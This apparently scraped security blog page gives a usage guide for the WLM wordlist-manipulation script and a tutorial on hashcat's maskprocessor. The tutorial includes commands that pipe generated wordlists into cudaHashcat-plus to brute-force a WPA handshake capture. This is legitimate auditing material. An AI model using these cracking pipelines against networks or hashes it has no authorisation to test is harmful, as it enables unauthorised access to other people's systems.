Wordlists are an integral part of many checks/audits and being able to ensure the wordlists meet your needs is imperative.<br />
Of course when creating a wordlist you try to ensure that it is going to be as tailor made as possible, however sometimes you may want to adjust an existing wordlist to some extent.<br />
<br />
WLM is a script which is basically bundling a whole load of text-processing commands into a menu structure to allow an easy overview of the most commonly used/requested wordlist alterations.<br />
<br />
WLM was only made to work on linux based systems, it has been tested with good results on BackTrack and BackBox Linux but cannot advise whether it works on any other OS/Distro.<br />
<br />
<br />
INSTALLATION<br />
<b>=============</b><br />
<a href="http://www.backbox.org/" target="_blank">BackBox Linux</a> developer ZEROF has been kind enough to make <a href="http://forum.backbox.org/videos/wordlist-manipulation-on-backbox/msg4846/#msg4846" target="_blank">a debian package</a> for easy installation on BackBox Linux which can be installed on BackBox as below ;<br />
<br />
Open terminal and type:<br />
<br />
<div>
<b>wget http://wordlist-manipulator.googlecode.com/files/wlm-0.8_all.deb</b></div>
<div>
<b>sudo dpkg -i wlm-0.8_all.deb</b></div>
<div>
To use the tool type <span style="color: lime;"><b>wlm</b></span> in a terminal or open <i>BackBox menu</i> -> <i>Auditing</i> -> <i>Miscellaneous</i> -> wlm</div>
<br />
<br />
For BackTrack, simply download the script to a directory of your choice.<br />
<div>
After having downloaded the code and saved as 'wlm', the file needs to be made executable as follows ;</div>
<b><span style="color: lime;">chmod +x wlm</span></b><br />
The script can then be run from that same directory with<span style="color: lime;"> <b>./wlm</b></span><br />
<div>
<br /></div>
<br />
The code can be reviewed here ;<br />
<a href="http://code.google.com/p/wordlist-manipulator/source/browse/wlm" target="_blank">http://code.google.com/p/wordlist-manipulator/source/browse/wlm</a><br />
<div>
<br /></div>
<br />
Script (v0.7) can also be downloaded here ;<br />
<a href="http://www.mediafire.com/file/p1tn76qw95hobi4/wlm">http://www.mediafire.com/file/p1tn76qw95hobi4/wlm</a><br />
<div>
<br /></div>
<div>
<br /></div>
<br />
<b>BASIC USAGE</b><br />
<b>============</b><br />
<br />
If you have installed on BackBox with the debian package, then no need to do anything else.<br />
<div>
<div>
<br /></div>
<div>
For use in BackBox when installed using the debian package, simply type 'wlm' followed by a word to give all possible permutations of that word ;</div>
</div>
<br />
<b><span style="color: lime;">wlm one</span></b><br />
<b><span style="color: lime;">wlm ten</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm01-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm01-1.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Or simply type wlm and hit Enter to get the main options menu.<br />
<b><span style="color: lime;">wlm</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="468" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm02.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Or go to the <b><i>BBox menu</i></b> > <b><i>Auditing</i></b> > <b><i>Miscellaneous</i></b> > <b>wlm </b><br />
which will also give you the main options menu.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm03-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="344" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm03-1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In BackBox you can also of course simply download the script, make it executable and run from the directory with<b> <span style="color: lime;">./wlm</span></b> as well, same as you would in BackTrack ;<br />
<br />
You can test all possible permutations of a word by typing ./wlm followed by a word (for instance 'one')<br />
<b><span style="color: lime;">./wlm one</span></b><br />
<br />
Or you can simply type ./wlm and hit Enter to get the main options menu.<br />
<b><span style="color: lime;">./wlm</span></b><br />
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>ALL OPTIONS</b></div>
<div>
<b>============</b></div>
<div>
<br /></div>
<div>
Each main option has a submenu and the full range of options are ; </div>
<div>
<br /></div>
<div>
<div>
<b>1. Case Options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Change case of first letter of each word in the wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Change case of last letter of each word in the wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Change all lower case to upper case.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.4<span class="Apple-tab-span" style="white-space: pre;"> </span>Change all upper case to lower case.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.5<span class="Apple-tab-span" style="white-space: pre;"> </span>Invert case of each letter in each word.</div>
<div>
<br /></div>
<div>
<b>2. Combination options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>2.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Combine words from 1 list to all words in another list.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>2.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Combine all wordlists in a directory into 1 wordlist.</div>
<div>
<br /></div>
<div>
<b>3. Prefix characters to wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix numeric values in sequence (ie. 0-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix fixed number of numeric values in sequence (ie. 000-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix a word or characters to wordlist.</div>
<div>
<br /></div>
<div>
<b>4. Append / Suffix characters to wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix numeric values in sequence (ie. 0-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix fixed number of numeric values in sequence (ie. 000-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix a word or characters to wordlist.</div>
<div>
<br /></div>
<div>
<b>5. Include characters</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>5.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Include characters from a certain postion from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>5.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Include characters from a certain postion from end of word.</div>
<div>
<br /></div>
<div>
<b>6. Substitute/Replace characters</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters from end of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters at specified positions in list.</div>
<div>
<br /></div>
<div>
<b>7. Optimize / tidy up wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Full optimization of wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Optimize for WPA (min 8 chars max 63 chars).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Sort words based on wordlength</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>(can help process speed with some programmes such as cRARk)</div>
<div>
<br /></div>
<div>
<b>8. Split options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>8.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Split wordlists based on a user defined max linecount in each slit file.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>8.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Split wordlists based on a user defined max size of each split file.</div>
<div>
<br /></div>
<div>
<b>9. Removal / Deletion options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove characters at a certain position from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove characters at a certain position before end of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove specific characters globally from words.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.4 <span class="Apple-tab-span" style="white-space: pre;"> </span>Removing words containing specific characters from wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.5<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words with more than X number of identical adjacent characters from wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.6<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words existing in 1 list from another list (test version only for small lists).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.7<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words that do not have X number of numeric values.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.8<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words that have X number of repeated characters.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.9<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words of a certain length.</div>
<div>
<br /></div>
<div>
<b>10. Miscellaneous fun</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Check possible wordlist sizes (with same min-max length only).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Create a wordlist from a range of dates (datelist).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Strip SSIDs from a kismet generated .nettxt file.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.4<span class="Apple-tab-span" style="white-space: pre;"> </span>Basic leetify options for wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.5 Leetify/Permute wordlist (Gitsnik's permute.pl script).</div>
<div>
<br /></div>
<div>
<b>f. File information</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>Gives information on aspects of selected file ;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Filetype</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Wordcount of file</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Longest line</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- File Size</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- first 3 and last 3 lines of file</div>
<div>
<br /></div>
<div>
<b>h. Version and help information</b>.</div>
</div>
<div>
<br /></div>
<div>
<b>u. Check for updates to the script</b>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>GENERAL USAGE </b></div>
<div>
<b>================</b></div>
<div>
<br /></div>
<div>
Choose the desired option and the submenu option as appropriate. </div>
<div>
<br /></div>
<div>
You will be prompted to enter the /path/to/wordlist which you want to modify</div>
<div>
There is <b><i>no auto-complete</i></b> on this, so the correct path syntax and correct spelling is imperative !</div>
<div>
<br /></div>
<div>
You will then be prompted to specify a filename for the resulting altered wordlist.</div>
<div>
again, there is <b><i>no auto-complete</i></b> on this, so the correct path syntax and correct spelling is imperative !</div>
<div>
<br /></div>
<div>
<i>(You can actually also browse to the wordlists in File Manager and drag and drop in the wlm terminal)</i></div>
<div>
<br /></div>
<div>
Depending on the option chosen, you may be prompted for more input. </div>
<div>
<br /></div>
<div>
In the below example, have chosen Option 1 (Case Options) followed by Sub-Menu option 1 (Change case of first letter)</div>
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm04-2.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="525" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm04-2.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
The principal for all other options from 1 - 9 is the same ; </div>
<div>
> Enter filename to be altered </div>
<div>
> Enter output filename</div>
<div>
> Provide further input as prompted/required.</div>
<div>
<br /></div>
<div>
Should you risk overwriting an existing file, then wlm will warn you of this so you can cancel without making any changes. </div>
<div>
<br /></div>
<div>
<br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ScreenshotWLM05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ScreenshotWLM05.jpg" width="640" /></a></div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><i>!NOTE! </i></b><br />
<div>
<b><i>If using BBox and if you may be overwriting files, then wlm may require to be run as root !</i></b><br />
<br />
<div>
<div>
(BackTrack runs root as standard, so no special measures required when using in BackTrack)</div>
<div>
</div>
</div>
<div>
</div>
</div>
<div>
<br />
If running BBox and possibly requiring to overwrite existing files, start wlm in terminal (not from menu) with;<br />
<b><span style="color: lime;">sudo wlm</span></b></div>
<div>
<b><span style="color: lime;"><br /></span></b></div>
<br />
<br />
<br />
<br /></div>
</div>
Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-8356530514965708840.post-49495146248400044082012-04-01T15:45:00.000+02:002012-04-01T15:45:24.790+02:00Vytautas Mineral WaterF*** Yeah ;)<br />
<br />
Random post despite the after warning :D<br />
<br />
This sh*t has to be legit, I wants it ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzutkNoOYuR1knS3Rk4GEvFDlODy6HNwdpVfsSsZBLA_ALe2Ca3dHfjKtFqfhQBh3YWE-vKtr5TBprwRVpOzQ' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>Unknownnoreply@blogger.com19tag:blogger.com,1999:blog-8356530514965708840.post-84102056075948794082012-02-21T13:08:00.030+01:002012-03-04T12:12:03.158+01:00Hashcat's Maskprocessor<b><span style="color: red;">Work in progress, post still to be fully completed.</span></b><br />
<b><br />
</b><br />
<b>Creating wordlists for piping through to oclHashcat.</b><br />
<br />
Maskprocessor is a highly configurable, high performance wordlist generator which can be run under<br />
either Linux or Windows (yay, I can continue to be lazy ;) )<br />
It is blisteringly fast.<br />
<br />
Output from maskprocessor can be piped to for instance oclHashcat+ for hash cracking.<br />
<br />
Installing maskprocessor on BackTrack 5 ;<br />
<span style="color: lime;">apt-get update</span><br />
<span style="color: lime;">apt-get install maskprocessor</span><br />
However at time of writing (21-02-2012) the version in the backtrack repositories is out of date and missing increment options.<br />
(backtrack's version is v0.65 whereas latest version is v0.67)<br />
<i>With the recently released (01-03-2012) BT5R2 repositories however the latest version </i><br />
<i>is included. </i><br />
<br />
<span style="color: lime;">cd /pentest/passwords/maskprocessor/</span><br />
<span style="color: lime;">./mp32.bin --help</span><br />
<span style="color: lime;">./mp32.bin -V</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp01.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Info and download latest version ;<br />
<a href="http://hashcat.net/wiki/maskprocessor" target="_blank">http://hashcat.net/wiki/maskprocessor</a><br />
<br />
So download and replace the .bin file in /pentest/passwords/maskprocessor/ directory with the downloaded version your system requires (either 32bit or 64bit).<br />
With the latest version increment options are now available.<br />
<span style="color: lime;">./mp32.bin --help</span><br />
<span style="color: lime;">./mp32.bin -V</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="532" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp02.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>CREATING WORDLISTS WITH MASKPROCESSOR</b><br />
As seen in the above help information, maskprocessor comes with several pre-defined charsets as in oclHashcat+, among which;<br />
<br />
<span style="color: yellow;">?l</span> -- lower case alpha values<br />
<span style="color: yellow;">?u</span> -- upper case alpha values<br />
<span style="color: yellow;">?d</span> -- numeric values<br />
<span style="color: yellow;">?s</span> -- special characters including space<br />
<br />
Upto 4 custom charsets can be defined using the switches -1, -2, -3, -4, for example ;<br />
<span style="color: yellow;">-1</span> ?dABCDEF (0123456789ABCDEF)<br />
<span style="color: yellow;">-2</span> QWERTY (just the letters QWERTY)<br />
<span style="color: yellow;">-3</span> ?u123 (uppercase alpha values & 123)<br />
<span style="color: yellow;">-4</span> ?l?u?d?s (lower & upper alpha-numeric-special)<br />
<br />
<i>In the below examples I will not be writing to file and just showing the stdout of the command given. </i><br />
<i>To actually write the output to file you would simply include the -o switch ; </i><br />
<i><span style="color: lime;">./mp32.bin ?d?d?d?d?d?d?d?d?d?d -o wordlist.txt </span></i><br />
<i>Remember that wordlist sizes can quickly become large and impractical.</i><br />
<br />
Creating an 8 character lower alpha wordlist<br />
from aaaaaaaa to zzzzzzzz ;<br />
<span style="color: lime;">./mp32.bin ?l?l?l?l?l?l?l?l </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp03.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Creating an 8 character upper alpha wordlist<br />
from AAAAAAAA to ZZZZZZZZ ;<br />
<span style="color: lime;">./mp32.bin ?u?u?u?u?u?u?u?u </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp04.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Creating an 8 character numeric wordlist<br />
from 00000000 to 99999999 ;<br />
<span style="color: lime;">./mp32.bin ?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp05.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The masks can be changed to what you may require to either fix certain character values at certain positions<br />
or to have multiple charsets at given positions using custom charset masks.<br />
<br />
To create a wordlist with the first 4 characters being numeric values and the last 4 characters being upper case alpha values<br />
from 0000AAAA to 9999ZZZZ ;<br />
<br />
<span style="color: lime;">./mp32.bin ?d?d?d?d?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp06.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist with lower alpha and numeric values.<br />
<i>(note that the order in which you define the custom charset will define how the sequence of characters is </i><i>printed to the wordlist, but will not change the final content of the total wordlist)</i><br />
from aaaaaaaa to 99999999 ;<br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?d ?1?1?1?1?1?1?1?1 </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp07.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist with the first 4 characters being lower and upper case alpha values and the last 4 characters being numeric values<br />
from aaaa0000 to ZZZZ9999 ;<br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?u ?1?1?1?1?d?d?d?d</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp08.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create an 8 character wordlist with the 1st and 2nd characters being lower and upper case alpha values, the 3rd to 6th characters being (upper case) hexadecimal values and the last 2 characters being special characters (including space); <br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?u -2 ?dABCDEF ?1?1?2?2?2?2?s?s </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp09.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So wordlist output can be masked in numerous ways to best suit what you are trying to achieve.<br />
<br />
<br />
<br />
<b>CREATING WORDLISTS IN INCREMENTS</b><br />
<b>=====================================</b><br />
<br />
All of the above can also be done directly in oclHashcat+ when specifying masks to use for<br />
hash cracking, however maskprocessor comes into play when requiring to create wordlists<br />
in increments.<br />
<br />
Using the <span style="color: red;"><b>-i</b></span> switch we tell maskprocessor to create the wordlist in increments, either from the first to the last masked character or from -- to user-defined positions.<br />
<br />
<br />
To create a wordlist from 1 character to 10 characters.<br />
Starting from 0 and ending at 9999999999<br />
<br />
<span style="color: lime;">./mp32.bin -i ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp10.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If we want to create a wordlist for WPA/WPA2 then of course there is no point in creating wordlists shorter than 8 characters (minimum passphrase length for WPA/WPA2), so in such a case we would specify to have the increments start at the 8th character.<br />
<br />
To create a wordlist with at least 8 numeric values and increment by 1 until it reaches 10 characters;<br />
Starting at 00000000 (8 characters) and stopping at 9999999999 (10 characters)<br />
<br />
<span style="color: lime;">./mp32.bin -i --increment-min=8 ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp11.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp11.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As maskprocessor requires masks to be entered, there is no real need to specify the max wordlength as that is also done by the number of mask placeholders.<br />
You could however for instance have 10 mask placeholders and specify to stop at the 9th position ;<br />
<br />
<span style="color: lime;">./mp32.bin -i --increment-min=8 --increment-max=9 ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
Will start at 00000000 (8 characters) and stop at 999999999 (9 characters).<br />
<br />
<br />
<br />
<b>EMULATING INCREMENTAL BRUTEFORCE ATTACK</b><br />
<b>=============================================</b><br />
<br />
So to put all this to practice together with cracking a hash with oclHashcat+, we could pipe output<br />
from maskprocessor through to oclHashcat+<br />
<i>Note that although maskprocessor can create words of over 15 characters, oclHashcat+ will not </i><i>process any passphrases with more than 15 characters.</i><br />
<i><span style="color: red;">So your hash cracking fun with oclHashcat+ is limited to max 15 characters.</span></i><br />
<br />
Again I will switch to my Windows system for this.. ;)<br />
I extracted the maskprocessor executable to the same directory as oclHashcat for sake of ease;<br />
c:\oclHashcat\<br />
As I am running a 64bit OS, I am using the mp64.exe<br />
<br />
<br />
To start at aaaaaaaa (8 characters) and finish at zzzzzzzzzz (10 characters as there are only 10 mask placeholders) piping through to oclHashcat ;<br />
<br />
<span style="color: lime;">mp64.exe -i --increment-min=8 ?l?l?l?l?l?l?l?l?l?l | cudaHashcat-plus64.exe -m 2500 fubar.hccap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_02.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Using mixed case starting at aaaaaaaa (8 characters) and stopping at ZZZZZZZZZZ (10 characters)<br />
(Using the <b><span style="color: red;">^</span></b> symbol to break the line for clarity's sake, in linux you would use the backslash <span style="color: red;"><b>\</b></span><br />
to break the line)<br />
<br />
<span style="color: lime;">mp64.exe -1 ?l?u -i --increment-min=8 --increment-max=10 ?1?1?1?1?1?1?1?1?1?1 | ^</span><br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 40 fubar.hccap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_03.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
